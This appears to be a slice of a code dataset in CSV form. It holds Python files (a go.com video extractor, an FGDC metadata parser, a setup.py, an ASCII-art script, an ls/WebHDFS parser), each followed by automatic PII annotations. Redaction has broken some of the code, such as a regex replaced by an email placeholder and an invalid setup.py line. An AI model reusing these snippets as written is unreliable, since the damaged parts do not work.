['URL', 'nib.Com'], ['URL', 'nib.Fi'], ['URL', 'nib.CommandLine.in'], ['URL', 'nib.Com'], ['URL', 'nib.Com'], ['URL', 'nib.CommandLine.in'], ['URL', 'nib.Com'], ['URL', 'config.se'], ['URL', 'nib.Com'], ['URL', 'ci3.ru'], ['URL', 'res.ru'], ['URL', 'config.se'], ['URL', 'ci3.ru'], ['URL', 'ci3.in'], ['URL', 'res.ru'], ['URL', 'ci3.in'], ['URL', 'ci3.ru'], ['URL', 'res.ru'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'nib.Com'], ['URL', 'ci.in'], ['URL', 'ci.ru'], ['URL', 'res.runtime.me'], ['URL', 'res.runtime.st'], ['URL', 'nib.Com'], ['URL', 'ci.in'], ['URL', 'ci.ru'], ['URL', 'stdout.ni'], ['URL', 'res.runtime.st'], ['URL', 'res.runtime.st'], ['URL', 'nib.Com'], ['URL', 'ci.in'], ['URL', 'ci.ru'], ['URL', 'res.runtime.st'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'stdout.ni'], ['URL', 'res.runtime.st'], ['URL', 'os.ch'], ['URL', 'os.pa'], ['URL', 'os.ge'], ['URL', 'os.ch'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'res.runtime.st'], ['URL', 'os.pa'], ['URL', 'nib.CommandLine.se'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'res.runtime.me'], ['URL', 'res.runtime.st'], ['URL', 'nib.CommandLine.se'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'stdout.ni'], ['URL', 'res.runtime.st'], ['URL', 'nib.CommandLine.se'], ['URL', 'nib.Com'], ['URL', 'ci.ru'], ['URL', 'res.runtime.st'], ['URL', 'os.ch'], ['URL', 'dict.it']]" +53,"# coding: utf-8 +from __future__ import unicode_literals + +import re + +from .adobepass import AdobePassIE +from ..utils import ( + int_or_none, + determine_ext, + parse_age_limit, + urlencode_postdata, + ExtractorError, +) + + +class GoIE(AdobePassIE): + _SITE_INFO = { + 'abc': { + 'brand': '001', + 'requestor_id': 'ABC', + }, + 'freeform': { + 'brand': '002', + 'requestor_id': 'ABCFamily', + }, + 'watchdisneychannel': { + 'brand': '004', + 'requestor_id': 'Disney', + }, + 'watchdisneyjunior': { + 'brand': '008', + 'requestor_id': 'DisneyJunior', + }, + 'watchdisneyxd': { + 'brand': '009', + 'requestor_id': 'DisneyXD', + } + } + _VALID_URL = r'https?://(?:(?P%s)\.)?go\.com/(?:[^/]+/)*(?:vdka(?P\w+)|season-\d+/\d+-(?P[^/?#]+))' % '|'.join(_SITE_INFO.keys()) + _TESTS = [{ + 'url': 'http://abc.go.PI:KEY', + 'info_dict': { + 'id': '0_g86w5onx', + 'ext': 'mp4', + 'title': 'Sneak Peek: Language Arts', + 'description': 'PI:KEY', + }, + 'params': { + # m3u8 download + 'skip_download': True, + }, + }, { + 'url': 'http://abc.go.com/shows/after-paradise/video/most-recent/vdka3335601', + 'only_matching': True, + }] + + def _real_extract(self, url): + sub_domain, video_id, display_id = re.match(self._VALID_URL, url).groups() + if not video_id: + webpage = self._download_webpage(url, display_id) + video_id = self._search_regex( + # There may be inner quotes, e.g. 
data-video-id=""'VDKA3609139'"" + # from http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood + r'data-video-id=[""\']*VDKA(\w+)', webpage, 'video id') + site_info = self._SITE_INFO[sub_domain] + brand = site_info['brand'] + video_data = self._download_json( + 'http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/-1/-1/%s/-1/-1.json' % (brand, video_id), + video_id)['video'][0] + title = video_data['title'] + + formats = [] + for asset in video_data.get('assets', {}).get('asset', []): + asset_url = asset.get('value') + if not asset_url: + continue + format_id = asset.get('format') + ext = determine_ext(asset_url) + if ext == 'm3u8': + video_type = video_data.get('type') + data = { + 'video_id': video_data['id'], + 'video_type': video_type, + 'brand': brand, + 'device': '001', + } + if video_data.get('accesslevel') == '1': + requestor_id = site_info['requestor_id'] + resource = self._get_mvpd_resource( + requestor_id, title, video_id, None) + auth = self._extract_mvpd_auth( + url, video_id, requestor_id, resource) + data.update({ + 'token': auth, + 'token_type': 'ap', + 'adobe_requestor_id': requestor_id, + }) + else: + self._initialize_geo_bypass(['US']) + entitlement = self._download_json( + 'https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json', + video_id, data=urlencode_postdata(data), headers=self.geo_verification_headers()) + errors = entitlement.get('errors', {}).get('errors', []) + if errors: + for error in errors: + if error.get('code') == 1002: + self.raise_geo_restricted( + error['message'], countries=['US']) + error_message = ', '.join([error['message'] for error in errors]) + raise ExtractorError('%s said: %s' % (self.IE_NAME, error_message), expected=True) + asset_url += '?' 
+ entitlement['uplynkData']['sessionKey'] + formats.extend(self._extract_m3u8_formats( + asset_url, video_id, 'mp4', m3u8_id=format_id or 'hls', fatal=False)) + else: + f = { + 'format_id': format_id, + 'url': asset_url, + 'ext': ext, + } + if re.search(r'(?:/mp4/source/|_source\.mp4)', asset_url): + f.update({ + 'format_id': ('%s-' % format_id if format_id else '') + 'SOURCE', + 'preference': 1, + }) + else: + mobj = re.search(r'/(\d+)x(\d+)/', asset_url) + if mobj: + height = int(mobj.group(2)) + f.update({ + 'format_id': ('%s-' % format_id if format_id else '') + '%dP' % height, + 'width': int(mobj.group(1)), + 'height': height, + }) + formats.append(f) + self._sort_formats(formats) + + subtitles = {} + for cc in video_data.get('closedcaption', {}).get('src', []): + cc_url = cc.get('value') + if not cc_url: + continue + ext = determine_ext(cc_url) + if ext == 'xml': + ext = 'ttml' + subtitles.setdefault(cc.get('lang'), []).append({ + 'url': cc_url, + 'ext': ext, + }) + + thumbnails = [] + for thumbnail in video_data.get('thumbnails', {}).get('thumbnail', []): + thumbnail_url = thumbnail.get('value') + if not thumbnail_url: + continue + thumbnails.append({ + 'url': thumbnail_url, + 'width': int_or_none(thumbnail.get('width')), + 'height': int_or_none(thumbnail.get('height')), + }) + + return { + 'id': video_id, + 'title': title, + 'description': video_data.get('longdescription') or video_data.get('description'), + 'duration': int_or_none(video_data.get('duration', {}).get('value'), 1000), + 'age_limit': parse_age_limit(video_data.get('tvrating', {}).get('rating')), + 'episode_number': int_or_none(video_data.get('episodenumber')), + 'series': video_data.get('show', {}).get('title'), + 'season_number': int_or_none(video_data.get('season', {}).get('num')), + 'thumbnails': thumbnails, + 'formats': formats, + 'subtitles': subtitles, + } +",6904,"[['MEDICAL_LICENSE', 'ka3335601'], ['URL', ""http://abc.go.com/shows/after-paradise/video/most-recent/vdka3335601',""], ['LOCATION', '.adobepass'], ['LOCATION', 'video_id, display_id ='], ['URL', 're.ma'], ['URL', 'asset.ge'], ['URL', 'self.ge'], ['URL', 're.se'], ['PERSON', ""mobj = re.search(r'/(\\d+)x(\\d+)/'""], ['URL', 'cc.ge'], ['URL', 'thumbnail.ge'], ['URL', 'thumbnail.ge'], ['PERSON', ""int_or_none(video_data.get('season""], ['URL', 'http://freeform.go.com/shows/shadowhunters/episodes/season-2/1-this-guilty-blood'], ['URL', ""http://api.contents.watchabc.go.com/vp2/ws/contents/3000/videos/%s/001/-1/-1/-1/%s/-1/-1.json'""], ['URL', ""https://api.entitlement.watchabc.go.com/vp2/ws-secure/entitlement/2020/authorize.json',""], ['URL', 'INFO.ke'], ['URL', 'data.ge'], ['URL', 'asset.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'entitlement.ge'], ['URL', 'error.ge'], ['URL', 'self.IE'], ['URL', 're.se'], ['URL', 'mobj.gr'], ['URL', 'mobj.gr'], ['URL', 'data.ge'], ['URL', 'subtitles.se'], ['URL', 'cc.ge'], ['URL', 'data.ge'], ['URL', 'thumbnail.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge'], ['URL', 'data.ge']]" +54,"# -*- coding: ISO-8859-15 -*- +# ============================================================================= +# Copyright (c) 2010 Tom Kralidis +# +# Authors : Tom Kralidis dummy@email.com +# +# Contact email: dummy@email.com +# ============================================================================= + +"""""" FGDC metadata parser """""" + +from __future__ import (absolute_import, division, print_function) + +from owscapable.etree import etree 
+from owscapable import util + +class Metadata(object): + """""" Process metadata """""" + def __init__(self, md): + if hasattr(md, 'getroot'): # standalone document + self.xml = etree.tostring(md.getroot()) + else: # part of a larger document + self.xml = etree.tostring(md) + + self.idinfo = Idinfo(md) + self.eainfo = Eainfo(md) + self.distinfo = Distinfo(md) + self.metainfo = Metainfo(md) + + if self.idinfo.datasetid: + self.identifier = self.idinfo.datasetid + +class Idinfo(object): + """""" Process idinfo """""" + def __init__(self, md): + val = md.find('idinfo/datasetid') + self.datasetid = util.testXMLValue(val) + + val = md.find('idinfo/citation') + self.citation = Citation(val) + + val = md.find('idinfo/descript') + if val is not None: + self.descript = Descript(val) + + val = md.find('idinfo/timeperd') + self.timeperd = Timeperd(val) + + val = md.find('idinfo/status') + if val is not None: + self.status = Status(val) + + val = md.find('idinfo/spdom') + if val is not None: + self.spdom = Spdom(val) + + val = md.find('idinfo/keywords') + if val is not None: + self.keywords = Keywords(val) + + val = md.find('idinfo/accconst') + self.accconst = util.testXMLValue(val) + + val = md.find('idinfo/useconst') + self.useconst = util.testXMLValue(val) + + val = md.find('idinfo/ptcontac') + if val is not None: + self.ptcontac = Ptcontac(val) + + val = md.find('idinfo/datacred') + self.datacred = util.testXMLValue(val) + + val = md.find('idinfo/crossref') + self.crossref = Citation(val) + +class Citation(object): + """""" Process citation """""" + def __init__(self, md): + if md is not None: + self.citeinfo = {} + + val = md.find('citeinfo/origin') + self.citeinfo['origin'] = util.testXMLValue(val) + + val = md.find('citeinfo/pubdate') + self.citeinfo['pubdate'] = util.testXMLValue(val) + + val = md.find('citeinfo/title') + self.citeinfo['title'] = util.testXMLValue(val) + + val = md.find('citeinfo/geoform') + self.citeinfo['geoform'] = util.testXMLValue(val) + + val = md.find('citeinfo/pubinfo/pubplace') + self.citeinfo['pubplace'] = util.testXMLValue(val) + + val = md.find('citeinfo/pubinfo/publish') + self.citeinfo['publish'] = util.testXMLValue(val) + + self.citeinfo['onlink'] = [] + for link in md.findall('citeinfo/onlink'): + self.citeinfo['onlink'].append(util.testXMLValue(link)) + +class Descript(object): + """""" Process descript """""" + def __init__(self, md): + val = md.find('abstract') + self.abstract = util.testXMLValue(val) + + val = md.find('purpose') + self.purpose = util.testXMLValue(val) + + val = md.find('supplinf') + self.supplinf = util.testXMLValue(val) + +class Timeperd(object): + """""" Process timeperd """""" + def __init__(self, md): + if md is not None: + val = md.find('current') + self.current = util.testXMLValue(val) + + val = md.find('timeinfo') + if val is not None: + self.timeinfo = Timeinfo(val) + +class Timeinfo(object): + """""" Process timeinfo """""" + def __init__(self, md): + val = md.find('sngdate') + if val is not None: + self.sngdate = Sngdate(val) + + val = md.find('rngdates') + if val is not None: + self.rngdates = Rngdates(val) + +class Sngdate(object): + """""" Process sngdate """""" + def __init__(self, md): + val = md.find('caldate') + self.caldate = util.testXMLValue(val) + val = md.find('time') + self.time = util.testXMLValue(val) + +class Rngdates(object): + """""" Process rngdates """""" + def __init__(self, md): + val = md.find('begdate') + self.begdate = util.testXMLValue(val) + val = md.find('begtime') + self.begtime = 
util.testXMLValue(val) + val = md.find('enddate') + self.enddate = util.testXMLValue(val) + val = md.find('endtime') + self.endtime = util.testXMLValue(val) + +class Status(object): + """""" Process status """""" + def __init__(self, md): + val = md.find('progress') + self.progress = util.testXMLValue(val) + + val = md.find('update') + self.update = util.testXMLValue(val) + +class Spdom(object): + """""" Process spdom """""" + def __init__(self, md): + val = md.find('bounding/westbc') + self.westbc = util.testXMLValue(val) + + val = md.find('bounding/eastbc') + self.eastbc = util.testXMLValue(val) + + val = md.find('bounding/northbc') + self.northbc = util.testXMLValue(val) + + val = md.find('bounding/southbc') + self.southbc = util.testXMLValue(val) + + if (self.southbc is not None and self.northbc is not None and + self.eastbc is not None and self.westbc is not None): + self.bbox = Bbox(self) + +class Bbox(object): + """""" Generate bbox for spdom (convenience function) """""" + def __init__(self, spdom): + self.minx = spdom.westbc + self.miny = spdom.southbc + self.maxx = spdom.eastbc + self.maxy = spdom.northbc + +class Keywords(object): + """""" Process keywords """""" + def __init__(self, md): + self.theme = [] + self.place = [] + self.temporal = [] + + for i in md.findall('theme'): + theme = {} + val = i.find('themekt') + theme['themekt'] = util.testXMLValue(val) + theme['themekey'] = [] + for j in i.findall('themekey'): + themekey = util.testXMLValue(j) + if themekey is not None: + theme['themekey'].append(themekey) + self.theme.append(theme) + + for i in md.findall('place'): + theme = {} + place = {} + val = i.find('placekt') + theme['placekt'] = util.testXMLValue(val) + theme['placekey'] = [] + for j in i.findall('placekey'): + theme['placekey'].append(util.testXMLValue(j)) + self.place.append(place) + + for i in md.findall('temporal'): + theme = {} + temporal = {} + val = i.find('tempkt') + theme['tempkt'] = util.testXMLValue(val) + theme['tempkey'] = [] + for j in i.findall('tempkey'): + theme['tempkey'].append(util.testXMLValue(j)) + self.temporal.append(temporal) + +class Ptcontac(object): + """""" Process ptcontac """""" + def __init__(self, md): + val = md.find('cntinfo/cntorgp/cntorg') + self.cntorg = util.testXMLValue(val) + + val = md.find('cntinfo/cntorgp/cntper') + self.cntper = util.testXMLValue(val) + + val = md.find('cntinfo/cntpos') + self.cntpos = util.testXMLValue(val) + + val = md.find('cntinfo/cntaddr/addrtype') + self.addrtype = util.testXMLValue(val) + + val = md.find('cntinfo/cntaddr/address') + self.address = util.testXMLValue(val) + + val = md.find('cntinfo/cntaddr/city') + self.city = util.testXMLValue(val) + + val = md.find('cntinfo/cntaddr/state') + self.state = util.testXMLValue(val) + + val = md.find('cntinfo/cntaddr/postal') + self.postal = util.testXMLValue(val) + + val = md.find('cntinfo/cntaddr/country') + self.country = util.testXMLValue(val) + + val = md.find('cntinfo/cntvoice') + self.voice = util.testXMLValue(val) + + val = md.find('cntinfo/cntemail') + self.email = util.testXMLValue(val) + +class Eainfo(object): + """""" Process eainfo """""" + def __init__(self, md): + val = md.find('eainfo/detailed/enttyp/enttypl') + self.enttypl = util.testXMLValue(val) + + val = md.find('eainfo/detailed/enttyp/enttypd') + self.enttypd = util.testXMLValue(val) + + val = md.find('eainfo/detailed/enttyp/enttypds') + self.enttypds = util.testXMLValue(val) + + self.attr = [] + for i in md.findall('eainfo/detailed/attr'): + attr = {} + val = i.find('attrlabl') 
+ attr['attrlabl'] = util.testXMLValue(val) + + val = i.find('attrdef') + attr['attrdef'] = util.testXMLValue(val) + + val = i.find('attrdefs') + attr['attrdefs'] = util.testXMLValue(val) + + val = i.find('attrdomv/udom') + attr['udom'] = util.testXMLValue(val) + + self.attr.append(attr) + +class Distinfo(object): + """""" Process distinfo """""" + def __init__(self, md): + val = md.find('distinfo') + if val is not None: + val2 = val.find('stdorder') + if val2 is not None: + self.stdorder = {'digform': []} + for link in val2.findall('digform'): + digform = {} + digform['name'] = util.testXMLValue(link.find('digtinfo/formname')) + digform['url'] = util.testXMLValue(link.find('digtopt/onlinopt/computer/networka/networkr/')) + self.stdorder['digform'].append(digform) + +class Metainfo(object): + """""" Process metainfo """""" + def __init__(self, md): + val = md.find('metainfo/metd') + self.metd = util.testXMLValue(val) + + val = md.find('metainfo/metrd') + self.metrd = util.testXMLValue(val) + + val = md.find('metainfo/metc') + if val is not None: + self.metc = Ptcontac(val) + + val = md.find('metainfo/metstdn') + self.metstdn = util.testXMLValue(val) + + val = md.find('metainfo/metstdv') + self.metstdv = util.testXMLValue(val) + + val = md.find('metainfo/metac') + self.metac = util.testXMLValue(val) + + val = md.find('metainfo/metuc') + self.metuc = util.testXMLValue(val) +",10441,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2010'], ['PERSON', 'Tom Kralidis'], ['PERSON', 'Tom Kralidis dummy@email.com'], ['PERSON', 'md):'], ['PERSON', 'md):\n val'], ['PERSON', 'self.timeperd = Timeperd(val'], ['PERSON', 'md):\n '], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['PERSON', 'md):\n val'], ['PERSON', 'md):\n '], ['PERSON', 'md):\n val'], ['PERSON', ""md.find('sngdate""], ['PERSON', 'md):\n val'], ['PERSON', ""md.find('caldate""], ['PERSON', 'self.time = util.testXMLValue(val'], ['PERSON', 'md):\n val'], ['PERSON', ""md.find('begdate""], ['PERSON', ""md.find('begtime""], ['PERSON', ""md.find('enddate""], ['PERSON', 'md):\n val'], ['PERSON', ""md.find('update""], ['PERSON', 'md):\n val'], ['PERSON', 'md):\n val'], ['PERSON', 'md):\n val'], ['PERSON', 'self.enttypd ='], ['PERSON', 'md):\n val'], ['URL', 'val2.fi'], ['URL', 'link.fi'], ['URL', 'link.fi'], ['PERSON', 'md):\n val'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'owscapable.et'], ['URL', 'etree.to'], ['URL', 'md.ge'], ['URL', 'etree.to'], ['URL', 'self.id'], ['URL', 'self.me'], ['URL', 'self.id'], ['URL', 'self.id'], ['URL', 'self.id'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.de'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.st'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.ke'], ['URL', 'md.fi'], ['URL', 'self.ac'], ['URL', 'md.fi'], ['URL', 'self.us'], ['URL', 'md.fi'], ['URL', 'self.pt'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.cr'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.su'], ['URL', 'md.fi'], ['URL', 'self.cu'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.sn'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.ca'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.be'], ['URL', 'md.fi'], ['URL', 'self.be'], ['URL', 
'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.pro'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.no'], ['URL', 'md.fi'], ['URL', 'self.so'], ['URL', 'self.so'], ['URL', 'self.no'], ['URL', 'self.bb'], ['URL', 'spdom.so'], ['URL', 'self.ma'], ['URL', 'self.ma'], ['URL', 'spdom.no'], ['URL', 'self.th'], ['URL', 'self.pl'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'self.th'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'self.pl'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'md.fi'], ['URL', 'self.cn'], ['URL', 'md.fi'], ['URL', 'self.cn'], ['URL', 'md.fi'], ['URL', 'self.cn'], ['URL', 'md.fi'], ['URL', 'self.ad'], ['URL', 'md.fi'], ['URL', 'self.ad'], ['URL', 'md.fi'], ['URL', 'self.ci'], ['URL', 'md.fi'], ['URL', 'self.st'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.co'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'md.fi'], ['URL', 'self.at'], ['URL', 'md.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'i.fi'], ['URL', 'self.at'], ['URL', 'md.fi'], ['URL', 'val.fi'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me'], ['URL', 'md.fi'], ['URL', 'self.me']]" +55,"import sys +from setuptools import setup + +tests_require = [""nose>=1.0""] +if sys.version_info < (3,0): + tests_require = [""nose>=1.0"", ""mock""] + +setup( + name=""unitils"", + version=""0.1.2"", + author=""iLoveTux"", + dummy@email.com"", + description=""Cross platform utilities I have found to be incredibly useful"", + license=""GPLv3"", + keywords=""utility tools cli"", + url=""http://github.com/ilovetux/unitils"", + packages=['unitils'], + install_requires=[""colorama""], + entry_points={ + ""console_scripts"": [ + ""cat.py=unitils.cli:cat"", + ""cp.py=unitils.cli:cp"", + ""find.py=unitils.cli:find"", + ""grep.py=unitils.cli:grep"", + ""head.py=unitils.cli:head"", + ""ls.py=unitils.cli:ls"", + ""mv.py=unitils.cli:mv"", + ""watch.py=unitils.cli:watch"", + ""wc.py=unitils.cli:wc"", + ""which.py=unitils.cli:which"", + ] + }, + test_suite=""nose.collector"", + tests_require=tests_require, + classifiers=[ + ""Development Status :: 4 - Beta"", + ""Topic :: Utilities"", + ""License :: OSI Approved :: GNU General Public License v3 (GPLv3)"", + ], +) +",1171,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'GPLv3'], ['URL', 'http://github.com/ilovetux/unitils"",'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'sys.ve'], ['URL', 'email.com'], ['URL', 'cat.py'], ['URL', 'unitils.cl'], ['URL', 'cp.py'], ['URL', 'unitils.cl'], ['URL', 'find.py'], ['URL', 'unitils.cl'], ['URL', 'grep.py'], ['URL', 'unitils.cl'], ['URL', 'head.py'], ['URL', 'unitils.cl'], ['URL', 'ls.py'], ['URL', 'unitils.cl'], ['URL', 'mv.py'], ['URL', 'unitils.cl'], ['URL', 'watch.py'], ['URL', 'unitils.cl'], ['URL', 'wc.py'], ['URL', 'unitils.cl'], ['URL', 'which.py'], ['URL', 'unitils.cl'], ['URL', 'nose.co']]" +56,"#!/usr/bin/env python + +# asciinator.py +# +# Copyright 2014 Christian Diener dummy@email.com +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation; either version 2 of the License, or +# (at your option) any later version. 
+# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, +# MA 02110-1301, USA. +# +# + +from __future__ import print_function # for python2 compat + +import sys; +from PIL import Image; +import numpy as np + +# ascii chars sorted by ""density"" +chars = np.asarray(list(' .,:;irsXA253hMHGS#9B&@')) + +# check command line arguments +if len(sys.argv) != 4: + print( 'Usage: asciinator.py image scale factor' ) + sys.exit() + +# set basic program parameters +# f = filename, SC = scale, GCF = gamma correction factor, WCF = width correction factor +f, SC, GCF, WCF = sys.argv[1], float(sys.argv[2]), float(sys.argv[3]), 7.0/4.0 + +# open, scale and normalize image by pixel intensities +img = Image.open(f) +S = (int(img.size[0]*SC*WCF), int(img.size[1]*SC)) +img = np.sum( np.asarray(img.resize(S), dtype=""float""), axis=2) +img -= img.min() +img = (1.0 - img/img.max())**GCF*(chars.size-1) + +# Assemble and print ascii art +print( ""\n"".join(("""".join(r) for r in chars[img.astype(int)]))) +print() +",1717,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Christian Diener'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['LOCATION', 'SC'], ['LOCATION', 'SC'], ['URL', 'asciinator.py'], ['URL', 'email.com'], ['URL', 'np.as'], ['URL', 'sys.ar'], ['URL', 'asciinator.py'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'img.si'], ['URL', 'img.si'], ['URL', 'np.su'], ['URL', 'np.as'], ['URL', 'img.re'], ['URL', 'img.ma'], ['URL', 'chars.si'], ['URL', 'img.as']]" +57,"#!/usr/bin/env python +# -*- coding: UTF-8 -*- + +import datetime +from time import strptime +import re +import os +import json + +class FileStatus(object): + def __init__(self, path, rights, nbFiles, owner, group, size, date, relpath = None): + self.path = path + + self.rights = rights + self.nbFiles = nbFiles + self.owner = owner + self.group = group + + self.size = size + + self.date = date + self.relpath = relpath + + def __eq__(self, other): + return (self.path == other.path and self.rights == other.rights and + self.nbFiles == other.nbFiles and self.owner == other.owner and self.group == other.group and + self.size == other.size and self.date == other.date) + + def is_dir(self): + return self.rights.startswith(""d"") + + def __str__(self): + return self.to_str(0, 0, 0, 0, 0, 0, 0) + + def to_str(self, rights_width, nbFiles_width, owner_width, group_width, size_width, date_width, path_with): + if self.is_dir: + nb_files = ""-"" + else: + nb_files = str(self.nbFiles) + result = ""%s %s %s %s %s %s %s"" % (self.rights.ljust(rights_width), + nb_files.ljust(nbFiles_width), + self.owner.ljust(owner_width), + self.group.ljust(group_width), + str(self.size).ljust(size_width), + self.date.strftime(""%Y-%M-%d %H:%M"").ljust(date_width), + self.path.ljust(path_with)) + return result.encode(""utf-8"") + +def get_file_statuses_pretty_print(file_statuses): + rights_width = 0 + nb_files_width = 0 + owner_width = 0 + group_width = 0 + size_width = 0 + date_width = 0 + path_width = 0 + + if len(file_statuses) != 0: + rights_width = max([len(fs.rights) for fs in file_statuses]) + nb_files_width = max([len(str(fs.nbFiles)) for fs in 
file_statuses]) + owner_width = max([len(fs.owner) for fs in file_statuses]) + group_width = max([len(fs.group) for fs in file_statuses]) + size_width = max([len(str(fs.size)) for fs in file_statuses]) + date_width = max([len(fs.date.strftime(""%Y-%M-%d %H:%M"")) for fs in file_statuses]) + path_width = max([len(fs.path) for fs in file_statuses]) + + result = [] + for file_status in file_statuses: + result.append(file_status.to_str(rights_width, nb_files_width, owner_width, group_width, size_width, date_width, path_width)) + return ""\n"".join(result) + +class LsParser(object): + def __init__(self): + pass + + def parse_line(self, line): + regex = ""^(dummy@email.com)$"" + + m = re.match(regex, line, re.UNICODE) + if m is None: + return None + + rights = m.group(1) + nbFiles = int(m.group(2)) + owner = m.group(3) + group = m.group(4) + size = int(m.group(5)) + + day = int(m.group(6)) + month = m.group(7) + try: + month = strptime(month, '%b').tm_mon + except: + month = [u""jan"", u""fév"", u""mar"", u""avr"", u""mai"", u""jui"", u""juil"", u""aoû"", u""sep"", u""oct"", u""nov"", u""déc""].index(month) + 1 + + try: + year = int(m.group(8)) + except: + year = datetime.datetime.now().year + filename = m.group(9) + + date = datetime.date(year, month, day) + + return FileStatus(filename, rights, nbFiles, owner, group, size, date) + + def parse(self, output): + result = [self.parse_line(line) for line in output.split(""\n"")] + return [p for p in result if p is not None] + +class WebHdfsParser(object): + def __init__(self, path): + self.path = path + + def permissions_to_unix_name(self, is_dir, rights): + is_dir_prefix = 'd' if is_dir else '-' + sticky = False + if len(rights) == 4 and rights[0] == '1': + sticky = True + rights = rights[1:] + dic = {'7': 'rwx', '6': 'rw-', '5': 'r-x', '4': 'r--', '3': '-wx', '2': '-w-', '1': '--x', '0': '---'} + result = is_dir_prefix + ''.join(dic[x] for x in rights) + if sticky: + result = result[:-1] + ""t"" + return result + + def parse_status(self, status): + relpath = status[""pathSuffix""] + path = os.path.join(self.path, relpath) + nbFiles = 0 + size = status[""length""] + owner = status[""owner""] + group = status[""group""] + is_dir = status[""type""] == ""DIRECTORY"" + right_digits = status[""permission""] + rights = self.permissions_to_unix_name(is_dir, right_digits) + + parsed_date = datetime.datetime.utcfromtimestamp(int(status[""modificationTime""])/1000) + + date = datetime.datetime(parsed_date.year, parsed_date.month, parsed_date.day, parsed_date.hour, parsed_date.minute) + + return FileStatus(path, rights, nbFiles, owner, group, size, date, relpath) + + + def parse(self, output): + try: + j = json.loads(output) + except: + print output + return [] + if ""FileStatuses"" not in j or ""FileStatus"" not in j[""FileStatuses""]: + print j + return [] + statuses = j[""FileStatuses""][""FileStatus""] + result = [] + for status in statuses: + result.append(self.parse_status(status)) + return result +",5405,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['NRP', 'other.nbFiles'], ['PERSON', 'self.owner == other.owner'], ['NRP', 'self.rights.ljust(rights_width'], ['LOCATION', 'self.date.strftime(""%Y-%M-%d'], ['NRP', 'owner_width'], ['LOCATION', 'owner_width'], ['DATE_TIME', 'month'], ['DATE_TIME', 'parsed_date.day'], ['URL', 'self.pa'], ['URL', 'self.gr'], ['URL', 'self.si'], ['URL', 'self.re'], ['URL', 'self.pa'], ['URL', 'other.pa'], ['URL', 'self.gr'], ['URL', 'other.gr'], ['URL', 'self.si'], ['URL', 'other.si'], ['URL', 'self.rights.st'], ['URL', 'self.to'], 
